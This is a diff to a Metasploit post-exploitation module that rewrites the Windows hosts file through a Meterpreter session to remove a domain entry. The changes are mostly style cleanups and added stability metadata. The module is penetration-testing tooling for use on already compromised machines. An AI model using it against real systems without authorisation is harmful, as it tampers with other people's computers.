@@ -28,6 +28,11 @@ class MetasploitModule < Msf::Post
               core_channel_write
             ]
           }
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [CONFIG_CHANGES],
+          'Reliability' => []
         }
       )
     )
@@ -42,12 +47,11 @@ class MetasploitModule < Msf::Post
   def run
     hosttoremove = datastore['DOMAIN']
     # remove hostname from hosts file
-    fd = client.fs.file.new("C:\\WINDOWS\\System32\\drivers\\etc\\hosts", "r+b")
+    fd = client.fs.file.new('C:\\WINDOWS\\System32\\drivers\\etc\\hosts', 'r+b')
 
     # Get a temporary file path
     meterp_temp = Tempfile.new('meterp')
     meterp_temp.binmode
-    temp_path = meterp_temp.path
 
     print_status("Removing hosts file entry pointing to #{hosttoremove}")
 
@@ -55,8 +59,7 @@ class MetasploitModule < Msf::Post
     fdray = fd.read.split("\r\n")
 
     fdray.each do |line|
-      if line.match("\t#{hosttoremove}$")
-      else
+      unless line.match("\t#{hosttoremove}$")
         newfile += "#{line}\r\n"
       end
     end
@@ -67,6 +70,6 @@ class MetasploitModule < Msf::Post
     meterp_temp.close
 
     client.fs.file.upload_file('C:\\WINDOWS\\System32\\drivers\\etc\\hosts', meterp_temp)
-    print_good("Done!")
+    print_good('Done!')
   end
 end
